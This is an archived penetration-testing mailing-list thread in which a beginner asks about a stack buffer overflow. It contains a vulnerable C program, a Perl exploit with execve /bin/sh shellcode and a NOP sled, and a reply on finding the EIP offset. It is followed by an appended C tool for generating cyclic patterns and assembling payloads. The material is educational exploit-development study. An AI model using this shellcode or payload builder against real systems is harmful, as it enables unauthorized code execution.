Penetration Testing mailing list archives

Re: Simple Buffer Overflow
From: "Sanjay R" <2sanjayr () gmail com>
Date: Mon, 14 Jan 2008 09:27:38 +0530

Hi:
Before writing your exploit code, you should check the length of the
buffer that will overwrite EIP. As you mentioned that you are a beginner
(like me!!), I advise you to always follow a step-by-step approach. Once
you gain expertise, play with it as much as you like. So you need to
do:
1. Pass a randomly large string (1000 chars, in unique 4-char groups).
2. On getting a segmentation fault, see the address in GDB.
3. Since we have taken unique substrings of length 4, you will be
able to find the substring (the 4 chars that overwrite EIP). Count the
chars.
4. Now write your exploit code.

-sanjay

On 10 Jan 2008 02:09:46 -0000,  <loki6 () orange nl> wrote:
Hi there and thank you for reading this,


I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.


As I've said I'm new to this field and my goal is to be able to anticipate possible buffer overflow exploits.


I've created this simple script: "test.c" :


[code]
#include <stdio.h>
#include <string.h>   /* strcpy */

int main(int argc, char **argv){
 char buffer[256];

 if (argc == 1) {
  printf("Usage: %s (input)\n", argv[0]);
  return 1;   /* without this, strcpy would be handed argv[1] == NULL */
 }

 strcpy(buffer, argv[1]);   /* no length check: the overflow under study */
 printf(buffer);            /* argv[1] is also used as the format string */

 return 0;
}
[/code]




Then I'm trying to exploit it with:





[code]
#!/usr/bin/perl

# Perl hex escapes need backslashes ("\x90"), not "/x90": as posted, "/x90/x9a/xbf"
# was the literal 12-character ASCII string. Note this is still only three bytes;
# EIP needs four, written least significant byte first.
$ret = "\x90\x9a\xbf";

# execve("/bin//sh") shellcode, 22 bytes
$shellcode = "\xb0\x0b".
      "\x99".
      "\x52".
      "\x68\x2f\x2f\x73\x68".
      "\x68\x2f\x62\x69\x6e".
      "\x89\xe3".
      "\x52".
      "\x53".
      "\x89\xe1".
      "\xcd\x80";

$exploit = "\x90" x 235;   # NOP sled
$exploit .= $shellcode;
$exploit .= $ret;

# list form: the payload reaches a.out as a single argv[1] without passing through the shell
system("./a.out", $exploit);
[/code]



The shellcode is an execve /bin/sh.

When I run the perl script it simply returns my bash prompt. So the exploit didn't work.


When I type 'exit' afterwards, I'm dropped from the su shell I was in previously, confirming there isn't a "/bin/sh"
process.


Now the funny thing is when I overflow the buffer of a.out in gdb, with:



  run `perl -e 'print "A"x262'`

Program received signal SIGSEGV, Segmentation fault

0x08048412 in main ()


It doesn't overflow the EIP, because when I use:

  i r


It says:


eip    0x8048412     0x8048412  <main+126>



The first time I tried today it overflowed the EIP correctly and I didn't change anything.


ECX is 0x41414141 and

ESP is 0x4141413d

EBP is 0xbf004141


Since the stack and frame pointers both have 41 in them, I figure part of them is overflowed. Why not the Extended
Instruction Pointer?


I was wondering if someone was able to help me with this, because I really want to get the hang of this.


I don't know if I got the NOP sled and return address right either, because when using GDB:



   x/s $esp


I get:


0x4141413d:   <Address 0x4141413d out of bounds>


I'm kinda stuck from there.


My problem in short:


- How do I get a reliable return address with GDB

- How do I determine the length of the NOP sled

- How do I test shellcode



Thanks for reading this..

Thanks for any help, pointers and advice.


ironmonkey6

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------





-- 
Computer Security Learner
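The four steps in the reply above, carried out in code. This is an added example, not code from either post: it generates a Metasploit-style pattern in which every 4-byte window is unique (step 1), turns the EIP value GDB prints after the crash back into the offset at which the return address sits (steps 2 and 3), and lays out sled, shellcode and return address for step 4. It assumes the thread's target (32-bit x86 Linux, little-endian, payload delivered through argv); the file name cyclic.c, the function names and the example values in the comments are mine. The shellcode in the original post is 22 bytes, so in such a payload it starts at offset - 22.

```c
/* cyclic.c (added example, not from the thread): unique-substring crash pattern,
 * offset recovery from the crashed EIP, and payload layout for a stack overflow.
 * Build: gcc -o cyclic cyclic.c
 * Usage: ./cyclic 1000              print a 1000-byte pattern
 *        ./cyclic 1000 0x37694136   find where that EIP value came from
 * Assumes a 32-bit little-endian x86 target fed through argv. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Pattern of 3-byte groups upper/lower/digit: Aa0Aa1Aa2 ... Ab0Ab1 ... Ba0 ...
 * Every 4-byte window is unique within the first 20280 bytes, so the 4 bytes
 * that land in EIP identify exactly one position. buf must hold len + 1 bytes. */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                char grp[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = grp[i];
            }
    buf[n] = '\0';
    return n;
}

/* eip is the value GDB shows after the crash. x86 is little-endian, so the
 * pattern byte at the lowest stack address is the low byte of that value.
 * Returns the offset of those 4 bytes in a pattern of length len, or -1 if
 * they do not occur (0x41414141 from an all-'A' buffer tells you nothing).
 * Works the same for EBP or any other register that took pattern bytes. */
long pattern_offset(uint32_t eip, size_t len)
{
    char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((eip >> (8 * i)) & 0xff);
    char *pat = malloc(len + 1);
    if (!pat) return -1;
    size_t n = pattern_create(pat, len);
    long off = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) { off = (long)i; break; }
    free(pat);
    return off;
}

/* Layout: [NOP sled][shellcode][ret]. The sled fills the gap between the start
 * of the buffer and the saved return address, so its length is offset minus
 * the shellcode length and the whole payload is offset + 4 bytes.
 * Returns 0 if the shellcode does not fit or ret contains a 0x00 byte: an argv
 * string ends at the first NUL, so such an address cannot be delivered this way. */
size_t build_payload(unsigned char *out, size_t offset,
                     const unsigned char *sc, size_t sclen, uint32_t ret)
{
    if (sclen > offset) return 0;
    for (int i = 0; i < 4; i++)
        if (((ret >> (8 * i)) & 0xff) == 0) return 0;
    size_t sled = offset - sclen;
    memset(out, 0x90, sled);                 /* NOP sled */
    memcpy(out + sled, sc, sclen);           /* shellcode */
    for (int i = 0; i < 4; i++)              /* ret, least significant byte first */
        out[offset + i] = (unsigned char)((ret >> (8 * i)) & 0xff);
    return offset + 4;
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s LEN [EIP]\n", argv[0]); return 1; }
    size_t len = strtoul(argv[1], NULL, 0);
    if (argc == 2) {                         /* step 1: print the pattern */
        char *pat = malloc(len + 1);
        if (!pat) return 1;
        pattern_create(pat, len);
        fputs(pat, stdout);
        free(pat);
        return 0;
    }
    /* steps 2 and 3: paste the crashed EIP back in to get the offset */
    uint32_t eip = (uint32_t)strtoul(argv[2], NULL, 0);
    long off = pattern_offset(eip, len);
    if (off < 0) { puts("not found in pattern"); return 1; }
    printf("EIP overwritten at offset %ld\n", off);
    return 0;
}
```

Run the target under GDB with the pattern as its argument (run `./cyclic 1000`), read EIP from `i r` after the SIGSEGV, and pass that value back to cyclic to get the offset; the sled length is that offset minus the shellcode length, and the return address goes in the 4 bytes right after. If EIP still points inside main, as in the GDB session quoted above, do the same with EBP's value: that gives the offset of the saved frame pointer, and the return address sits 4 bytes beyond it.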


